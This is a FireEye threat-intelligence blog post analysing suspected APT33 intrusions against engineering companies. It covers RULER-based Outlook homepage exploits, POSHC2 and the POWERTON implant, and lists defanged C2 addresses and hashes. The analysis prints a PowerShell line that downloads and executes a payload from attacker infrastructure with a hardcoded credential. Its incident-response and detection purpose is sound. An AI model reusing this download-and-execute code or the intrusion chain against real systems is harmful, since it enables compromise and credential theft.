Introduction
FireEye assesses APT33 may be behind a series of intrusions and
attempted intrusions within the engineering industry. Public reporting
indicates this activity may be related to recent destructive attacks.
FireEye’s
Managed
has responded to and contained numerous intrusions that we
assess are related. The actor is leveraging publicly available tools
in early phases of the intrusion; however, we have observed them
transition to custom implants in later stage activity in an attempt to
circumvent our detection.
On Sept. 20, 2017, FireEye Intelligence published a blog post
detailing spear phishing activity
targeting
. Recent public reporting
indicated possible links between the confirmed APT33 spear phishing
and
destructive
; however, we were unable to independently verify
this claim. FireEye’s Advanced Practices team leverages telemetry and
aggressive proactive operations to maintain visibility of APT33 and
their attempted intrusions against our customers. These efforts
enabled us to establish an operational timeline that was consistent
with multiple intrusions Managed Defense identified and contained
prior to the actor completing their mission. We correlated the
intrusions using an internally-developed similarity engine described
below. Additionally, public discussions have also indicated that
specific attacker infrastructure we observed is possibly related to
the recent destructive SHAMOON attacks.
45 days ago, during 24×7 monitoring, #ManagedDefense
detected & contained an attempted intrusion from
newly-identified adversary infrastructure*.
It is C2 for a code family we track as POWERTON.
*hxxps://103.236.149[.]100/api/info
― FireEye (@FireEye)
December
15, 2018
Identifying the Overlap in Threat Activity
FireEye augments our expertise with an
internally-developed
to evaluate potential associations and
relationships between groups and activity. Using concepts from
document clustering and topic modeling literature, this engine
provides a framework to calculate and discover similarities between
groups of activities, and then develop investigative leads for
follow-on analysis. Our engine identified similarities between a
series of intrusions within the engineering industry. The near
real-time results led to an in-depth comparative analysis. FireEye
analyzed all available organic information from numerous intrusions
and all known APT33 activity. We subsequently concluded, with medium
confidence, that two specific early-phase intrusions were the work of
a single group. Advanced Practices then reconstructed an operational
timeline based on confirmed APT33 activity observed in the last year.
We compared that to the timeline of the contained intrusions and
determined there were circumstantial overlaps to include remarkable
similarities in tool selection during specified timeframes. We assess
with low confidence that the intrusions were conducted by APT33. This
blog contains original source material only, whereas Finished
Intelligence including an all-source analysis is
available
. To best understand the
techniques employed by the adversary, it is necessary to provide
background on our Managed Defense response to this activity during
their 24×7 monitoring.
Managed Defense Rapid Responses: Investigating the Attacker
In mid-November 2017, Managed Defense identified and responded to
targeted threat activity at a customer within the engineering
industry. The adversary leveraged stolen credentials and a publicly
available tool, SensePost’s RULER , to configure a
client-side mail rule crafted to download and execute a malicious
payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\outlook\live.exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f ).
The payload was an AutoIT downloader that retrieved and executed
additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm . The
follow-on PowerShell profiled the target system’s architecture,
downloaded the appropriate variant of PowerSploit (MD5:
c326f156657d1c41a9c387415bf779d4 or
0564706ec38d15e981f71eaf474d0ab8 ), and reflectively loaded
PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or
17587668AC577FCE0B278420B8EB72AC ). The actor leveraged a
publicly available exploit for CVE-2017-0213 to escalate privileges,
publicly available windows SysInternals PROCDUMP to dump the LSASS
process, and publicly available MIMIKATZ to presumably steal
additional credentials. Managed Defense aided the victim in containing
the intrusion.
FireEye collected 168 PUPYRAT samples for a comparison. While import
hashes (IMPHASH) are insufficient for attribution, we found it
remarkable that out of the specified sampling, the actor’s IMPHASH was
found in only six samples, two of which were confirmed to belong to
the threat actor observed in Managed Defense, and one which is
attributed to APT33. We also determined APT33 likely transitioned from
PowerShell EMPIRE to PUPYRAT during this timeframe.
In mid-July of 2018, Managed Defense identified similar targeted
threat activity focused against the same industry. The actor leveraged
stolen credentials and RULER’s module that exploits CVE-2017-11774
(RULER.HOMEPAGE), modifying numerous users’ Outlook client homepages
for code execution and persistence. These methods are further explored
in this post in the "RULER In-The-Wild" section.
The actor leveraged this persistence mechanism to download and
execute OS-dependent variants of the publicly available .NET POSHC2
backdoor as well as a newly identified PowerShell-based implant
self-named POWERTON. Managed Defense rapidly engaged and successfully
contained the intrusion. Of note, Advanced Practices separately
established that APT33 began using POSHC2 as of at least July 2, 2018,
and continued to use it throughout the duration of 2018.
During the July activity, Managed Defense observed three variations
of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html . One example is
shown in Figure 1.
![OVERRULED: Containing a Potentially Destructive Adversary]()
Figure 1: Attacker’s homepage exploit (CVE-2017-11774)
The main encoded payload within each exploit leveraged WMIC to
conduct system profiling in order to determine the appropriate
OS-dependent POSHC2 implant and dropped to disk a PowerShell script
named “Media.ps1” within the user’s %LOCALAPPDATA% directory ( %LOCALAPPDATA%\MediaWs\Media.ps1 ) as shown in
Figure 2.
![OVERRULED: Containing a Potentially Destructive Adversary]()
Figure 2: Attacker’s “Media.ps1” script
The purpose of “ Media.ps1 ” was to decode
and execute the downloaded binary payload, which was written to disk
as “ C:\Users\Public\Downloads\log.dat ”. At a
later stage, this PowerShell script would be configured to persist on
the host via a registry Run key.
Analysis of the “ log.dat ” payloads
determined them to be variants of the publicly available POSHC2
proxy-aware stager written to download and execute PowerShell payloads
from a hardcoded command and control (C2) address. These particular
POSHC2 samples run on the .NET framework and dynamically load payloads
from Base64 encoded strings. The implant will send a reconnaissance
report via HTTP to the C2 server ( hxxps://51.254.71[.]223/images/static/content/ )
and subsequently evaluate the response as PowerShell source code. The
reconnaissance report contains the following information:
Username and domain
Computer name
CPU details
Current exe PID
Configured C2 server
The C2 messages are encrypted via AES using a hardcoded key and
encoded with Base64. It is this POSHC2 binary that established
persistence for the aforementioned “ Media.ps1 ” PowerShell script, which then decodes
and executes the POSHC2 binary upon system startup. During the
identified July 2018 activity, the POSHC2 variants were configured
with a kill date of July 29, 2018.
POSHC2 was leveraged to download and execute a new PowerShell-based
implant self-named POWERTON ( hxxps://185.161.209[.]172/api/info ) . The
adversary had limited success with interacting with POWERTON during
this time. The actor was able to download and establish persistence
for an AutoIt binary named “ ClouldPackage.exe ” (MD5:
46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON
“persist” command. The sole functionality of “ ClouldPackage.exe ” was to execute the following
line of PowerShell code:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback
= { $true }; $webclient = new-object System.Net.WebClient;
$webclient.Credentials = new-object
System.Net.NetworkCredential(‘public’,
‘fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye’); iex $webclient.DownloadString(‘hxxps://185.161.209[.]172/api/default’)
The purpose of this code is to retrieve “silent mode” POWERTON from
the C2 server. Note the actor protected their follow-on payloads with
strong credentials. Shortly after this, Managed Defense contained the intrusion.
Starting approximately three weeks later, the actor reestablished
access through a successful password spray. Managed Defense
immediately identified the actor deploying malicious homepages with
RULER to persist on workstations. They made some infrastructure and
tooling changes to include additional layers of obfuscation in an
attempt to avoid detection. The actor hosted their homepage exploit at
a new C2 server ( hxxp://5.79.66[.]241/index.html ). At least three
new variations of “ index.html ” were
identified during this period. Two of these variations contained
encoded PowerShell code written to download new OS-dependent variants
of the .NET POSHC2 binaries, as seen in Figure 3.
![OVERRULED: Containing a Potentially Destructive Adversary]()
Figure 3: OS-specific POSHC2 Downloader
Figure 3 shows that the actor made some minor changes, such as
encoding the PowerShell " DownloadString " commands and renaming the
resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the
commands will attempt to download the POSHC2 binaries from yet another
new C2 server ( hxxp://103.236.149[.]124/delivered.dat ). The name
of the .ps1 file dropped to decode and execute the POSHC2 variant also
changed to “ Vision.ps1 ”. During this August
2018 activity, the POSHC2 variants were configured with a “kill date”
of Aug. 13, 2018. Note that POSHC2 supports a kill date in order to
guardrail an intrusion by time and this functionality is built into
the framework.
Once again, POSHC2 was used to download a new variant of POWERTON
(MD5: c38069d0bc79acdc28af3820c1123e53 ), configured to
communicate with the C2 domain hxxps://basepack[.]org . At one point in
late-August, after the POSHC2 kill date, the adversary used
RULER.HOMEPAGE to directly download POWERTON, bypassing the
intermediary stages previously observed.
Due to Managed Defense’s early containment of these intrusions, we
were unable to ascertain the actor’s motivations; however, it was
clear they were adamant about gaining and maintaining access to the
victim’s network.
Adversary Pursuit: Infrastructure Monitoring
Advanced Practices conducts aggressive proactive operations in order
to identify and monitor adversary infrastructure at scale. The
adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16
and Oct. 11, 2018. On at least Oct. 11, 2018, the adversary changed
the payload (MD5: 8be06571e915ae3f76901d52068e3498 ) to download
and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info
(MD5: 4047e238bbcec147f8b97d849ef40ce5 ). This specific
URL was identified in a
public
as possibly related to recent destructive attacks. We
are unable to independently verify this correlation with any organic
information we possess.
On Dec. 13, 2018, Advanced Practices proactively identified and
attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5:
f0fe6e9dde998907af76d91ba8f68a05 ). The payload was crafted to
download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: 53ae59ed03fa5df3bf738bc0775a91d9 ).
Table 1 contains the operational timeline for the activity we analyzed.
DATE/TIME (UTC)
NOTE
INDICATOR
2017-08-15 17:06:59
APT33 EMPIRE (Used)
8a99624d224ab3378598b9895660c890
2017-09-15 16:49:59
APT33 PUPYRAT (Compiled)
